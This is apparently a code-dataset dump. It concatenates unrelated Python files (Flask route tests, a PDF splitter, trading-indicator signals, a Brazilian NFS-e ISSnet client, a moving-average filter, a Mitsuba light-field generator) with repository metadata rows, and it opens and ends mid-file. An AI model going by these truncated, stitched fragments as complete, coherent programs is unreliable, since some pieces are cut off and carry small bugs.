patch = functools.partialmethod(test_client.patch, **user_auth)
return PatchedFlaskClient
@pytest.fixture()
def test_route_uuid(webhook_server: ConfigServer, router_app: FlaskClient) -> Iterable[str]:
create_route_resp = router_app.post(
"/create-route",
data=json.dumps({
"name": "route",
"destination": "http://127.0.0.1"
}),
content_type='application/json'
)
uuid = json.loads(create_route_resp.data)["uuid"]
try:
yield uuid
finally:
router_app.delete(f"/routes/{uuid}")
def test_create_route(router_app: FlaskClient):
create_route_resp = router_app.post(
"/create-route",
data=json.dumps({
"name": "route",
"destination": "http://127.0.0.1"
}),
content_type='application/json'
)
assert create_route_resp.status_code == 201
def test_get(router_app: FlaskClient, test_route_uuid: str):
assert router_app.get(f"/routes/{test_route_uuid}").status_code == 200
def test_get_by_token(router_app: FlaskClient, test_route_uuid: str):
token = json.loads(router_app.get(f"/routes/{test_route_uuid}").data)["token"]
assert router_app.get(f"/routes/token/{token}").status_code == 200
def test_patch(router_app: FlaskClient, test_route_uuid: str):
assert router_app.patch(
f"/routes/{test_route_uuid}",
data=json.dumps({
"name": "new-name"
}),
content_type='application/json',
).status_code == 204
assert json.loads(router_app.get(f"/routes/{test_route_uuid}").data)["name"] == "new-name"
@pytest.mark.usefixtures("test_route_uuid")
def test_get_all(router_app: FlaskClient):
all_routes_resp = router_app.get("/routes")
assert all_routes_resp.status_code == 200
data = json.loads(all_routes_resp.data)
assert len(data) == 1 and data[0]["name"] == "route"
def test_delete(router_app: FlaskClient, test_route_uuid: str):
assert router_app.delete(f"/routes/{test_route_uuid}").status_code == 204
assert router_app.get(f"/routes/{test_route_uuid}").status_code == 404
def test_regenerate(router_app: FlaskClient, test_route_uuid: str):
prev_token = json.loads(router_app.get(f"/routes/{test_route_uuid}").data)["token"]
resp = router_app.post(f"/routes/{test_route_uuid}/regenerate")
assert resp.status_code == 200
assert json.loads(resp.data)["token"] != prev_token
def test_add_user_link(router_app: FlaskClient, test_route_uuid: str):
test_auth = {
"headers": {
"user": "other_user-p@example.com"
}
}
assert router_app.post(f"/links/{test_route_uuid}", **test_auth).status_code == 201
assert len(json.loads(router_app.get("/routes", **test_auth).data)) == 1
def test_get_user_link(router_app: FlaskClient, test_route_uuid: str):
test_auth = {
"headers": {
"user": "other_user-p@example.com"
}
}
assert router_app.get(f"/links/{test_route_uuid}", **test_auth).status_code == 404
assert router_app.get(f"/links/{test_route_uuid}").status_code == 200
def test_remove_user_link(router_app: FlaskClient, test_route_uuid: str):
test_auth = {
"headers": {
"user": "other_user-p@example.com"
}
}
test_add_user_link(router_app, test_route_uuid)
assert router_app.delete(f"/links/{test_route_uuid}", **test_auth).status_code == 204
assert len(json.loads(router_app.get("/routes", **test_auth).data)) == 0
def test_get_route_stats(router_app: FlaskClient, test_route_uuid: str):
assert router_app.get(f"/routes/{test_route_uuid}/statistics").status_code == 200
def test_get_route_logs(router_app: FlaskClient, test_route_uuid: str):
assert router_app.get(f"/routes/{test_route_uuid}/logs").status_code == 200
@pytest.mark.usefixtures("test_route_uuid")
def test_all_routes_stats(router_app: FlaskClient):
assert router_app.get(f"/routes/statistics").status_code == 200
def test_all_routes_stats_with_no_stats(router_app: FlaskClient):
assert router_app.get(f"/routes/statistics").status_code == 200
| 31.621302
| 94
| 0.691804
| 309
| 0.057822
| 730
| 0.136602
| 1,927
| 0.360591
| 0
| 0
| 1,008
| 0.188623
|
a1e5ccbd0c595e22be2f8bf21bf5897f8d70355d
| 1,318
|
py
|
Python
|
Scripts/spliter.py
|
sawa25/PDFs-TextExtract
|
bdc4469deab8b023135165ce8dbc63577927a508
|
[
"MIT"
] | 87
|
2020-05-08T00:04:17.000Z
|
2022-03-27T11:39:04.000Z
|
Scripts/spliter.py
|
tzo13123/PDFs-TextExtract
|
3d00b7b4007557e1467fb5aca8bf8e37513de124
|
[
"MIT"
] | 5
|
2020-06-24T13:22:37.000Z
|
2021-04-10T21:39:32.000Z
|
Scripts/spliter.py
|
tzo13123/PDFs-TextExtract
|
3d00b7b4007557e1467fb5aca8bf8e37513de124
|
[
"MIT"
] | 49
|
2020-05-08T00:08:01.000Z
|
2022-02-04T21:04:03.000Z
|
import os
from PyPDF2 import PdfFileReader, PdfFileWriter
#Solution based in two functions:
#1.pdf remove : Remove existed pdf documents(result for your last split operation)
#2.pdf splitter : Split your main pdf document into group of documents.
def pdf_remove (length):
for i in range(length):
os.remove("../PDFs-TextExtract/split/{}".format(fname[i])) #Remove existed pdf documents in folder.
print("Deleted: ../PDFs-TextExtract/split/{}".format(fname[i]))
def pdf_splitter(path):
fname = os.path.splitext(os.path.basename(path))[0]
pdf = PdfFileReader(path)
for page in range(pdf.getNumPages()):
pdf_writer = PdfFileWriter()
pdf_writer.addPage(pdf.getPage(page))
output_filename = '../PDFs-TextExtract/split/{}.pdf'.format(page+1)
with open(output_filename, 'wb') as out:
pdf_writer.write(out)
print('Created: {}'.format(output_filename))
if __name__ == '__main__':
path = '../PDFs-TextExtract/pdf_merged.pdf' #specifiy your main pdf document path.
fname = os.listdir('../PDFs-TextExtract/split/') #fname: List contain pdf documents names in folder
length = len(fname) #Retrieve List fname Length.
#call pdf remove function
pdf_remove(length)
#call pdf splitter function
pdf_splitter(path)
| 32.95
| 107
| 0.69044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 588
| 0.446131
|
a1e6051e4e110799735dcb4615879dd95634d238
| 107
|
py
|
Python
|
swagger_client/apis/__init__.py
|
sendx/sendx-api-python
|
edce9755d3718efb12cb5493da7cbac961cb1d9b
|
[
"Apache-2.0"
] | null | null | null |
swagger_client/apis/__init__.py
|
sendx/sendx-api-python
|
edce9755d3718efb12cb5493da7cbac961cb1d9b
|
[
"Apache-2.0"
] | null | null | null |
swagger_client/apis/__init__.py
|
sendx/sendx-api-python
|
edce9755d3718efb12cb5493da7cbac961cb1d9b
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
# import apis into api package
from .contact_api import ContactApi
| 21.4
| 38
| 0.841121
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 30
| 0.280374
|
a1e9308fe3ee5db7d2721276c33a44e2c57e6e80
| 3,915
|
py
|
Python
|
strategy/overreact_strategy.py
|
tseng1026/SideProject-Investment
|
e7135e667cdee16d1d754ca0f9ebd88226083e66
|
[
"MIT"
] | null | null | null |
strategy/overreact_strategy.py
|
tseng1026/SideProject-Investment
|
e7135e667cdee16d1d754ca0f9ebd88226083e66
|
[
"MIT"
] | null | null | null |
strategy/overreact_strategy.py
|
tseng1026/SideProject-Investment
|
e7135e667cdee16d1d754ca0f9ebd88226083e66
|
[
"MIT"
] | null | null | null |
from typing import Callable
import numpy as np
from constants.constants import IndicatorType
from strategy.base import BaseStrategy
class OverReactStrategy(BaseStrategy):
def trade_by_indicator(
self, indicator_type: IndicatorType) -> Callable[[], np.ndarray]:
""" Get trading strategy function."""
if (indicator_type == IndicatorType.RSI):
return self.trade_by_rsi
elif (indicator_type == IndicatorType.MFI):
return self.trade_by_mfi
elif (indicator_type == IndicatorType.WILLR):
return self.trade_by_willr
else:
raise Exception("The strategy logic is unsupported.")
def trade_by_mfi(
self,
timeperiod: int = 14,
lowerbound: float = 30,
upperbound: float = 70,
) -> np.ndarray:
""" Consider overreact duration to be trading time.
1. buy when mfi is smaller than lower bound
2. sell when mfi is larger than upper bound
args:
timeperiod (int) [unit: times of the data interval]
lowerbound (float) the lower threshold implies oversold
upperbound (float) the upper threshold implies overbought
returns:
singal (np.ndarray): signal for trading points
(1 for buying and -1 for selling)
"""
mfi = self.indicator.mfi(timeperiod=timeperiod)
return self._get_signals(mfi,
lowerbound=lowerbound, upperbound=upperbound)
def trade_by_rsi(
self,
timeperiod: int = 14,
lowerbound: float = 30,
upperbound: float = 70,
) -> np.ndarray:
""" Consider overreact duration to be trading time.
1. buy when rsi is smaller than lower bound
2. sell when rsi is larger than upper bound
args:
timeperiod (int) [unit: times of the data interval]
lowerbound (float) the lower threshold implies oversold
upperbound (float) the upper threshold implies overbought
returns:
singal (np.ndarray): signal for trading points
(1 for buying and -1 for selling)
"""
rsi = self.indicator.rsi(timeperiod=timeperiod)
return self._get_signals(rsi,
lowerbound=lowerbound, upperbound=upperbound)
def trade_by_willr(
self,
timeperiod: int = 14,
lowerbound: float = 30,
upperbound: float = 70,
) -> np.ndarray:
""" Consider overreact duration to be trading time.
1. buy when willr is smaller than lower bound
2. sell when willr is larger than upper bound
args:
timeperiod (int) [unit: times of the data interval]
lowerbound (float) the lower threshold implies oversold
upperbound (float) the upper threshold implies overbought
returns:
singal (np.ndarray): signal for trading points
(1 for buying and -1 for selling)
"""
willr = self.indicator.willr(timeperiod=timeperiod)
return self._get_signals(willr,
lowerbound=lowerbound, upperbound=upperbound)
def _get_signals(
self,
line: np.ndarray,
lowerbound: float,
upperbound: float,
) -> np.ndarray:
"""
args:
line (np.ndarray): line, e.g. 10 MA
lowerbound (float): threshold for oversold
upperbound (float): threshold for overbought
returns:
singal (np.ndarray): signal for trading points
(1 for buying and -1 for selling)
"""
signal_buy = line < lowerbound
signal_sell = line > upperbound
return self._combine_signals(signal_buy, signal_sell)
| 35.590909
| 78
| 0.585951
| 3,778
| 0.965006
| 0
| 0
| 0
| 0
| 0
| 0
| 2,014
| 0.514432
|
a1ed273b2e4ad00a56a2ecb5eabb664805ce9cd8
| 12,746
|
py
|
Python
|
src/erpbrasil/edoc/provedores/issnet.py
|
Engenere/erpbrasil.edoc
|
2e835cc191407a8261c6f27933b7660d74b5a691
|
[
"MIT"
] | 8
|
2019-09-27T05:59:06.000Z
|
2022-01-16T21:04:04.000Z
|
src/erpbrasil/edoc/provedores/issnet.py
|
Engenere/erpbrasil.edoc
|
2e835cc191407a8261c6f27933b7660d74b5a691
|
[
"MIT"
] | 18
|
2020-10-05T19:23:59.000Z
|
2022-02-22T11:39:22.000Z
|
src/erpbrasil/edoc/provedores/issnet.py
|
Engenere/erpbrasil.edoc
|
2e835cc191407a8261c6f27933b7660d74b5a691
|
[
"MIT"
] | 10
|
2019-11-28T14:03:02.000Z
|
2022-02-25T14:06:14.000Z
|
# coding=utf-8
# Copyright (C) 2020 - TODAY, Marcel Savegnago - Escodoo
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import xml.etree.ElementTree as ET
from datetime import datetime
from erpbrasil.base import misc
from erpbrasil.edoc.nfse import NFSe
from erpbrasil.edoc.nfse import ServicoNFSe
try:
from nfselib.issnet.v1_00 import servico_cancelar_nfse_envio
from nfselib.issnet.v1_00 import servico_consultar_lote_rps_envio
from nfselib.issnet.v1_00 import servico_consultar_lote_rps_resposta
from nfselib.issnet.v1_00 import servico_consultar_nfse_rps_envio
from nfselib.issnet.v1_00 import servico_consultar_situacao_lote_rps_envio
from nfselib.issnet.v1_00 import servico_consultar_situacao_lote_rps_resposta
from nfselib.issnet.v1_00 import servico_enviar_lote_rps_resposta
issnet = True
except ImportError:
issnet = False
cidade = {
3543402: 'ribeiraopreto', # Ribeirão Preto - SP
3301702: 'duquedecaxias', # Duque de Caxias - RJ
}
endpoint = 'servicos.asmx?WSDL'
if issnet:
servicos = {
'envia_documento': ServicoNFSe(
'RecepcionarLoteRps',
endpoint, servico_enviar_lote_rps_resposta, True),
'consulta_recibo': ServicoNFSe(
'ConsultarSituacaoLoteRPS',
endpoint, servico_consultar_situacao_lote_rps_resposta, True),
'consultar_lote_rps': ServicoNFSe(
'ConsultarLoteRps',
endpoint, servico_consultar_lote_rps_resposta, True),
'cancela_documento': ServicoNFSe(
'CancelarNfse',
endpoint, servico_cancelar_nfse_envio, True),
'consulta_nfse_rps': ServicoNFSe(
'ConsultarNFSePorRPS',
endpoint, servico_consultar_nfse_rps_envio, True),
}
else:
servicos = ()
class Issnet(NFSe):
_header = None
def __init__(self, transmissao, ambiente, cidade_ibge, cnpj_prestador,
im_prestador):
if ambiente == '2':
self._url = 'https://www.issnetonline.com.br/webserviceabrasf/homologacao/'
else:
self._url = 'https://www.issnetonline.com.br/webserviceabrasf/' + cidade[int(cidade_ibge)] + '/'
self._servicos = servicos
super(Issnet, self).__init__(
transmissao, ambiente, cidade_ibge, cnpj_prestador, im_prestador)
def get_documento_id(self, edoc):
# edoc.LoteRps.ListaRps.Rps[0].InfRps.Id
return edoc.LoteRps.id, edoc.LoteRps.NumeroLote
def _prepara_envia_documento(self, edoc):
numero_lote = self._gera_numero_lote()
edoc.LoteRps.id = 'lote' + numero_lote
edoc.LoteRps.NumeroLote = int(numero_lote)
#
# Assinamos todas as RPS e o Lote
#
xml_assinado = edoc
# for rps in edoc.LoteRps.ListaRps.Rps:
# xml_assinado = self.assin a_raiz(xml_assinado, rps.InfRps.Id, getchildren=True)
# Assinamos o lote
# xml_assinado = self.assina_raiz(xml_assinado, edoc.LoteRps.Id)
# for rps in edoc.LoteRps.ListaRps.Rps:
# xml_assinado = self.assina_raiz(xml_assinado, rps.InfRps.Id)
# Assinamos o lote
xml_assinado = self.assina_raiz(xml_assinado, edoc.LoteRps.id)
xml_assinado = '<?xml version="1.0"?>' + xml_assinado
return xml_assinado
def _prepara_consulta_recibo(self, proc_envio):
raiz = servico_consultar_situacao_lote_rps_envio.ConsultarSituacaoLoteRpsEnvio(
# Id=self._gera_numero_lote(),
Prestador=servico_consultar_situacao_lote_rps_envio.tcIdentificacaoPrestador(
CpfCnpj=servico_consultar_situacao_lote_rps_envio.tcCpfCnpj(
Cnpj=self.cnpj_prestador,
),
InscricaoMunicipal=self.im_prestador
),
Protocolo=proc_envio.resposta.Protocolo
)
# xml_assinado = self.assina_raiz(raiz,"")
xml_string, xml_etree = self._generateds_to_string_etree(raiz)
xml_string = '<?xml version="1.0"?>' + xml_string
return xml_string
def _prepara_consultar_lote_rps(self, protocolo):
raiz = servico_consultar_lote_rps_envio.ConsultarLoteRpsEnvio(
# Id=self._gera_numero_lote(),
Prestador=servico_consultar_lote_rps_envio.tcIdentificacaoPrestador(
CpfCnpj=servico_consultar_lote_rps_envio.tcCpfCnpj(
Cnpj=self.cnpj_prestador,
),
InscricaoMunicipal=self.im_prestador
),
Protocolo=protocolo
)
# xml_assinado = self.assina_raiz(raiz, raiz.Id)
xml_string, xml_etree = self._generateds_to_string_etree(raiz)
xml_string = '<?xml version="1.0"?>' + xml_string
return xml_string
def _verifica_resposta_envio_sucesso(self, proc_envio):
if proc_envio.resposta.Protocolo:
return True
return False
def _edoc_situacao_em_processamento(self, proc_recibo):
if proc_recibo.resposta.Situacao == 2:
return True
return False
def _prepara_cancelar_nfse_envio(self, doc_numero):
raiz = servico_cancelar_nfse_envio.tcPedidoCancelamento(
InfPedidoCancelamento=servico_cancelar_nfse_envio.tcInfPedidoCancelamento(
id=doc_numero,
IdentificacaoNfse=servico_cancelar_nfse_envio.tcIdentificacaoNfse(
Numero=doc_numero,
Cnpj=self.cnpj_prestador,
InscricaoMunicipal=self.im_prestador,
CodigoMunicipio=self.cidade
if self.ambiente == '1'
else 999,
),
CodigoCancelamento='0001'
)
)
# Foi codificado desta forma porque a assinatura fica dentro da tag Pedido. Acredito que de para melhorar.
pedido = self.assina_raiz(raiz, '')
xml_assinado = '<?xml version="1.0"?>' \
'<p1:CancelarNfseEnvio ' \
'xmlns:p1="http://www.issnetonline.com.br/webserviceabrasf/vsd/servico_cancelar_nfse_envio.xsd" ' \
'xmlns:tc="http://www.issnetonline.com.br/webserviceabrasf/vsd/tipos_complexos.xsd" ' \
'xmlns:ts="http://www.issnetonline.com.br/webserviceabrasf/vsd/tipos_simples.xsd">' \
+ pedido + '</p1:CancelarNfseEnvio>'
xml_assinado = xml_assinado.replace('tcPedidoCancelamento', 'Pedido')
return xml_assinado
def _prepara_consultar_nfse_rps(self, **kwargs):
rps_numero = kwargs.get('rps_number')
rps_serie = kwargs.get('rps_serie')
rps_tipo = kwargs.get('rps_type')
raiz = servico_consultar_nfse_rps_envio.ConsultarNfseRpsEnvio(
IdentificacaoRps=servico_consultar_nfse_rps_envio.tcIdentificacaoRps(
Numero=rps_numero,
Serie=rps_serie,
Tipo=rps_tipo,
),
Prestador=servico_consultar_nfse_rps_envio.tcIdentificacaoPrestador(
CpfCnpj=servico_consultar_nfse_rps_envio.tcCpfCnpj(
Cnpj=self.cnpj_prestador,
),
InscricaoMunicipal=self.im_prestador
),
)
xml_string, xml_etree = self._generateds_to_string_etree(raiz)
xml_string = '<?xml version="1.0"?>' + xml_string
return xml_string
def analisa_retorno_consulta(self, processo, number, company_cnpj_cpf,
company_legal_name):
mensagem = ''
res = {}
retorno = ET.fromstring(processo.retorno)
nsmap = {'consulta': 'http://www.issnetonline.com.br/webserviceabrasf/vsd/'
'servico_consultar_nfse_rps_resposta.xsd',
'tc': 'http://www.issnetonline.com.br/webserviceabrasf/vsd/'
'tipos_complexos.xsd'}
if processo.webservice == 'ConsultarNFSePorRPS':
enviado = retorno.findall(
".//consulta:CompNfse", namespaces=nsmap)
nao_encontrado = retorno.findall(
".//consulta:MensagemRetorno", namespaces=nsmap)
if enviado:
# NFS-e já foi enviada
cancelada = retorno.findall(
".//consulta:NfseCancelamento", namespaces=nsmap)
if cancelada:
# NFS-e enviada foi cancelada
data = retorno.findall(
".//consulta:DataHora", namespaces=nsmap)[0].text
data = datetime.strptime(data, '%Y-%m-%dT%H:%M:%S'). \
strftime("%m/%d/%Y")
mensagem = 'NFS-e cancelada em ' + data
else:
numero_retorno = \
retorno.findall(".//tc:InfNfse/tc:Numero",
namespaces=nsmap)[0].text
cnpj_prestador_retorno = retorno.findall(
".//tc:IdentificacaoPrestador/tc:CpfCnpj/tc:Cnpj",
namespaces=nsmap)[0].text
razao_social_prestador_retorno = retorno.findall(
".//tc:PrestadorServico/tc:RazaoSocial",
namespaces=nsmap)[0].text
verify_code = \
retorno.findall(".//tc:InfNfse/tc:CodigoVerificacao",
namespaces=nsmap)[0].text
authorization_date = \
retorno.findall(".//tc:InfNfse/tc:DataEmissao",
namespaces=nsmap)[0].text
variables_error = []
if number and numero_retorno != number:
variables_error.append('Número')
if cnpj_prestador_retorno != misc.punctuation_rm(
company_cnpj_cpf):
variables_error.append('CNPJ do prestador')
if razao_social_prestador_retorno != company_legal_name:
variables_error.append('Razão Social de prestador')
if variables_error:
mensagem = 'Os seguintes campos não condizem com' \
' o provedor NFS-e: \n'
mensagem += '\n'.join(variables_error)
else:
mensagem = "NFS-e enviada e corresponde com o provedor"
res['codigo_verificacao'] = verify_code
res['numero'] = numero_retorno
res['data_emissao'] = authorization_date
return mensagem, res
elif nao_encontrado:
# NFS-e não foi enviada
mensagem_erro = retorno.findall(
".//tc:Mensagem", namespaces=nsmap)[0].text
correcao = retorno.findall(
".//tc:Correcao", namespaces=nsmap)[0].text
codigo = retorno.findall(
".//tc:Codigo", namespaces=nsmap)[0].text
mensagem = (codigo + ' - ' + mensagem_erro + ' - Correção: ' +
correcao + '\n')
else:
mensagem = 'Erro desconhecido.'
return mensagem
def analisa_retorno_cancelamento(self, processo):
if processo.webservice in ['CancelarNfse']:
mensagem_completa = ''
situacao = True
retorno = ET.fromstring(processo.retorno)
sucesso = retorno.findall(
".//{http://www.issnetonline.com.br/webserviceabrasf/vsd/"
"tipos_complexos.xsd}Sucesso")
if not sucesso:
mensagem_erro = retorno.findall(
".//{http://www.issnetonline.com.br/webserviceabrasf/vsd/"
"tipos_complexos.xsd}Mensagem")[
0].text
correcao = retorno.findall(
".//{http://www.issnetonline.com.br/webserviceabrasf/vsd/"
"tipos_complexos.xsd}Correcao")[
0].text
codigo = retorno.findall(
".//{http://www.issnetonline.com.br/webserviceabrasf/vsd/"
"tipos_complexos.xsd}Codigo")[
0].text
mensagem_completa += (
codigo + ' - ' +
mensagem_erro
)
if correcao:
mensagem_completa += (' - Correção: ' + correcao + '\n')
situacao = False
return situacao, mensagem_completa
| 40.722045
| 122
| 0.581751
| 10,899
| 0.854421
| 0
| 0
| 0
| 0
| 0
| 0
| 2,950
| 0.231264
|
a1ed89cc5c2446b1fe11b61f094fef9e3b0b2652
| 1,647
|
py
|
Python
|
python/filter_MA.py
|
vsellemi/macroeconomic-forecasting
|
a5ad1b88daae084f258c0f5e5b9bd9d145934375
|
[
"MIT"
] | 3
|
2021-11-29T11:18:40.000Z
|
2021-12-21T15:05:06.000Z
|
python/filter_MA.py
|
vsellemi/macroeconomic-forecasting
|
a5ad1b88daae084f258c0f5e5b9bd9d145934375
|
[
"MIT"
] | null | null | null |
python/filter_MA.py
|
vsellemi/macroeconomic-forecasting
|
a5ad1b88daae084f258c0f5e5b9bd9d145934375
|
[
"MIT"
] | 4
|
2021-11-29T11:18:48.000Z
|
2021-12-22T01:36:59.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 7 14:40:40 2021
@author: victorsellemi
"""
import numpy as np
def filter_MA(Y,q = 2):
"""
DESCRIPTION:
Decompose a time series into a trend and stationary component
using the moving average (MA) filter (i.e., low pass filter)
INPUT:
Y = (T x 1) vector of time series data
q = scalar value of moving average (half) window: default = 2
OUTPUT:
trend = (T x 1) vector of trend component of the time series, i.e., low frequency component
error = (T x 1) vector of stationary part of the time series
"""
# length of time series
T = Y.shape[0]
# window width
Q = 2*q
# border of the series is preserved
p1 = np.concatenate((np.eye(q), np.zeros((q,T-q))), axis = 1)
p2 = np.zeros((T-Q,T))
p3 = np.concatenate((np.zeros((q,T-q)), np.eye(q)), axis = 1)
P = np.concatenate((p1,p2,p3), axis = 0)
# part of the series to be averaged
X = np.eye(T-Q)
Z = np.zeros((T-Q,1))
for i in range(Q):
# update X
X = np.concatenate((X, np.zeros((T-Q,1))), axis = 1) + np.concatenate((Z, np.eye(T-Q)), axis = 1)
# update Z
Z = np.concatenate((Z, np.zeros((T-Q,1))), axis = 1)
X = np.concatenate((np.zeros((q,T)), X, np.zeros((q,T))), axis = 0)
# construct linear filter
L = P + (1/(Q+1)) * X
# construct the trend
trend = L.dot(Y)
# construct stationary component
signal = Y - trend
return trend,signal
| 24.58209
| 105
| 0.538555
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 821
| 0.498482
|
a1ed8f64fdb7a590a23d44e6a7e10803d5c52975
| 3,480
|
py
|
Python
|
LightFields/xmlFiles/generateXMLFiles.py
|
sudarshannagesh90/OptimizationDeepLearningImageProcessing
|
36ab96ce29a2403166f8f176eb84062c2db7cc6e
|
[
"MIT"
] | null | null | null |
LightFields/xmlFiles/generateXMLFiles.py
|
sudarshannagesh90/OptimizationDeepLearningImageProcessing
|
36ab96ce29a2403166f8f176eb84062c2db7cc6e
|
[
"MIT"
] | null | null | null |
LightFields/xmlFiles/generateXMLFiles.py
|
sudarshannagesh90/OptimizationDeepLearningImageProcessing
|
36ab96ce29a2403166f8f176eb84062c2db7cc6e
|
[
"MIT"
] | null | null | null |
import xml.etree.ElementTree as etree
import xml.dom.minidom
import subprocess
import os
import imageio
import h5py
import numpy as np
def createXMLstring(filename,scaleVal,cameraPosX,cameraPosY):
scene = etree.Element("scene",version="0.5.0")
sensor = etree.SubElement(scene, "sensor", type="perspective")
sensor_transform = etree.SubElement(sensor,"transform",name="toWorld")
etree.SubElement(sensor_transform,"lookat",origin=str(5)+","+cameraPosX+","+cameraPosY,target="0,0,0",up="0,1,0")
sensor_sampler = etree.SubElement(sensor,"sampler",type="ldsampler")
etree.SubElement(sensor_sampler,"integer",name="sampleCount",value="128")
sensor_film = etree.SubElement(sensor,"film",type="ldrfilm")
etree.SubElement(sensor_film,"boolean",name="banner",value="false")
etree.SubElement(sensor_film,"integer",name="width",value="400")
etree.SubElement(sensor_film,"integer",name="height",value="400")
shapeObj = etree.SubElement(scene,"shape",type="obj")
shapeObj_string = etree.SubElement(shapeObj,"string",name="filename",value=filename+".obj")
shapeObj_transform = etree.SubElement(shapeObj,"transform",name="toWorld")
etree.SubElement(shapeObj_transform,"scale",value=scaleVal)
etree.SubElement(shapeObj_transform,"rotate",angle="60",y="1")
rough_string = etree.tostring(scene, "utf-8")
reparsed = xml.dom.minidom.parseString(rough_string)
reparsed_pretty = reparsed.toprettyxml(indent=" " * 4)
return reparsed_pretty
def create_h5(data, label, path, file_name):
with h5py.File(os.path.join(path, file_name), 'w') as file:
file.create_dataset("data", data = data)
file.create_dataset("label", data = label)
filenames = ["airboat","al","alfa147","cessna","cube","diamond","dodecahedron","gourd","humanoid_quad","humanoid_tri","icosahedron","lamp","magnolia","minicooper","octahedron","power_lines","roi","sandal","shuttle","skyscraper","slot_machine","teapot","tetrahedron","violin_case"]
scaleVal = [0.5,0.5,0.01,0.08,0.5,0.01,0.5,0.5,0.1,0.1,0.5,0.2,0.025,0.01,0.5,0.07,0.02,0.2,0.1,0.03,0.1,0.01,0.5,0.5]
index = 0
cameraPosOrigin = [5,1,-3]
deltaCam = 0.1
hr_image = []
lr_image = []
destination_path = "/home/sudarshan/git/OptimizationDeepLearningImageProcessing/LightFields/h5Files/"
dataset_name = "generatedLightFields"
for filename in filenames:
HRindex = 0
with imageio.get_writer(filename+"/"+filename+".gif", mode='I') as writer:
for indx in range(-2,3):
for indy in range(-2,3):
cwd = os.getcwd()
directory = cwd+"/"+filename+"/"
if not os.path.exists(directory):
os.makedirs(directory)
cameraPos = [5, cameraPosOrigin[1]+indx*deltaCam,cameraPosOrigin[2]+indy*deltaCam]
XMLstring = createXMLstring(filename,str(scaleVal[index]),str(cameraPos[1]),str(cameraPos[2]))
with open(directory+filename+str(indx)+str(indy)+".xml", "w") as cube_xml:
cube_xml.write(XMLstring)
cmd = ["mitsuba", filename+"/"+filename+str(indx)+str(indy)+".xml"]
cmd_out = subprocess.check_output(cmd)
image = imageio.imread(filename+"/"+filename+str(indx)+str(indy)+".png")
hr_image.append(np.asarray(image))
HRindex = HRindex+1
if indx == 0 and indy == 0:
lr_image.append(np.asarray(image))
writer.append_data(image)
print(["Completed index: "+str(index)])
index = index+1
create_h5(data = lr_image, label = hr_image, path = destination_path, file_name = dataset_name+"training.h5")
print("data of length ", len(lr_image), "and label of length ", len(hr_image))
| 47.027027
| 280
| 0.72069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 788
| 0.226437
|
a1ee7d9e488784cc542ed9f4aaf3c9cd7f803d7f
| 3,001
|
py
|
Python
|
_old/test.py
|
DanielRabl/libtw2
|
ebcc833aa418e0ee25ff1da2881f7102dc7efa5d
|
[
"Apache-2.0",
"MIT"
] | 30
|
2017-07-21T19:05:07.000Z
|
2022-01-14T16:24:53.000Z
|
_old/test.py
|
DanielRabl/libtw2
|
ebcc833aa418e0ee25ff1da2881f7102dc7efa5d
|
[
"Apache-2.0",
"MIT"
] | 50
|
2017-11-20T16:43:05.000Z
|
2022-03-02T21:37:45.000Z
|
_old/test.py
|
DanielRabl/libtw2
|
ebcc833aa418e0ee25ff1da2881f7102dc7efa5d
|
[
"Apache-2.0",
"MIT"
] | 12
|
2017-07-21T19:05:10.000Z
|
2021-04-09T20:22:58.000Z
|
import datafile
from collections import defaultdict
def check_versions(df):
result = []
if len(df.types[0]) < 1:
result.append('no version')
return result
if len(df.types[0]) > 1:
result.append('multiple versions')
try:
version = df.types[0][0]
except IndexError:
result.append('version id not 1')
return result
if len(version.data) < 1:
result.append('version too small')
return result
if len(version.data) > 1:
result.append('version bigger than expected')
if version.data[0] != 1:
result.append('version not 1')
result.append(version.data[0])
return result
#struct CMapItemImage_v1
#{
# int m_Version;
# int m_Width;
# int m_Height;
# int m_External;
# int m_ImageName;
# int m_ImageData;
#} ;
#struct CMapItemImage : public CMapItemImage_v1
#{
# enum { CURRENT_VERSION=2 };
# int m_Format;
#};
def check_images(df):
for image_item in df.types[2]:
if 0 <= image_item.data[3] <= 1:
if image_item.data[3]:
continue
else:
print(df)
pass#print("<what?>")
print(image_item.data[3])
name_index = image_item.data[4]
try:
name = df.data[name_index]
except datafile.DatafileDataUncompressError:
name = "<none>"
#print(name)
return []
def main():
import argparse
p = argparse.ArgumentParser()
p.add_argument('filenames', metavar="DATAFILE", type=str, nargs='+', help="a datafile to be processed")
p.add_argument('-s', '--summary', action='store_true', help="show summary")
p.add_argument('-i', '--images', action='store_true', help="extract information about images")
p.add_argument('-v', '--versions', action='store_true', help="extract information about versions")
args = p.parse_args()
tasks = []
if args.images:
tasks.append('images')
if args.versions:
tasks.append('versions')
do_tasks = {'images': check_images, 'versions': check_versions}
results = {}
for task in tasks:
results[task] = defaultdict(lambda: set())
errors = defaultdict(lambda: set())
versions = defaultdict(lambda: set())
images = defaultdict(lambda: set())
for filename in args.filenames:
true_filename = filename
filename = filename.encode('utf-8', errors='ignore').decode('utf-8')
try:
df = datafile.Datafile(true_filename)
except datafile.DatafileError as e:
errors[e.__class__].add(filename)
print("{}: {}".format(filename, repr(e)))
else:
try:
for task in tasks:
for result in do_tasks[task](df):
results[task][result].add(filename)
finally:
df.close()
if args.summary:
print()
print("Error statistics:")
for err, filenames in errors.items():
print("### {}: {}, {}".format(err.__name__, len(filenames), " ".join(sorted(filenames))))
print()
print("Results:")
for task, result in results.items():
print("# {}:".format(task))
for desc, filenames in sorted(result.items(), key=lambda x: len(x[1]), reverse=True):
print("### {}: {}, {}".format(desc, len(filenames), " ".join(sorted(filenames)[:20])))
if __name__ == '__main__':
import sys
sys.exit(main())
| 25.008333
| 104
| 0.673775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 741
| 0.246918
|
a1ee7de4317afbc181dee20858eea2b69d2fac4c
| 5,414
|
py
|
Python
|
tests/test_rotate_3dmarkers.py
|
CRBS/etspecutil
|
d0b42730545cbf04e0cb222a40845e19ff9ee3f0
|
[
"OLDAP-2.6",
"Python-2.0"
] | null | null | null |
tests/test_rotate_3dmarkers.py
|
CRBS/etspecutil
|
d0b42730545cbf04e0cb222a40845e19ff9ee3f0
|
[
